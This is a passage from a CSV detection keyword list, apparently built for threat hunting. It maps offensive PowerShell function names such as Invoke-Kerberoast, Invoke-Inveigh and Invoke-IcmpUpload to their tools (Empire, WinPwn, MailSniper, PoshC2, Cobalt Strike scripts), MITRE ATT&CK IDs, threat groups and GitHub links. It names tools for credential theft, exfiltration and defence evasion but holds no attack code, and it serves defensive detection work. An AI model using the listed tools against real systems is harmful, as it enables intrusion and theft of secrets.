","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-FodHelperBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-FodHelperBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1127","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ForgeUserAgent*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*Invoke-Get-RBCD-Threaded*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Get-RBCD-Threaded*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-GlobalMailSearch*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-GlobalMailSearch*","offensive_tool_keyword","MailSniper","To search all mailboxes in a domain","T1595 T1114 T1590 T1591 T1114","N/A","N/A","N/A","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-GlobalO365MailSearch*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-GoFetch*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" +"*Invoke-Gopher*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-GPPPasswordCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-GPPPasswordCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Grouper2*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Grouper2*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Grouper3*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Grouper3*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-HandleKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-HandleKatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Handlekatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-HardenedUNCPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-HijackableDllsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-HijackableDllsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-HoneypotBuster*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","1","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" +"*Invoke-HostEnum -*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" +"*invoke-hostenum -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-HostEnum*","offensive_tool_keyword","red-team-scripts","script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch","T1016 - T1087.001 - T1049 - T1069","TA0007 - TA0003 - TA0006","N/A","N/A","Discovery","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" +"*Invoke-HostRecon*","offensive_tool_keyword","HostRecon","Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.","T1082 - T1087 - T1033","TA0001 - TA0007 - ","N/A","N/A","Information Gathering","https://github.com/dafthack/HostRecon","1","1","N/A","N/A","5","401","114","2017-10-03T13:25:06Z","2017-03-28T14:53:21Z" +"*invoke-hostscan*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-HotFixVulnCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-IcmpDownload*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" +"*Invoke-IcmpDownload.ps1*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" +"*Invoke-IcmpUpload.ps1*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" +"*Invoke-ImpersonateUser*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-InjectGEvent*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-InjectGEventAPI*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-InstalledProgramsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-InstalledServicesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-InstalledServicesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Interceptor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-Internalmonologue*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Internalmonologue*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Inveigh*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1068","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Inveigh*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Invoke-Inveigh*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-InveighRelay*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-InveighRelay.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1089","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-IR*","offensive_tool_keyword","Github Username","powershell forensic tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/Invoke-IR","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-IronCyclone*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Invoke-JSRatRegsvr*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-JSRatRundll*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-JuicyPotato*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invoke-kerberoast *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*invokekerberoast*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Invoke-Kerberoast*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 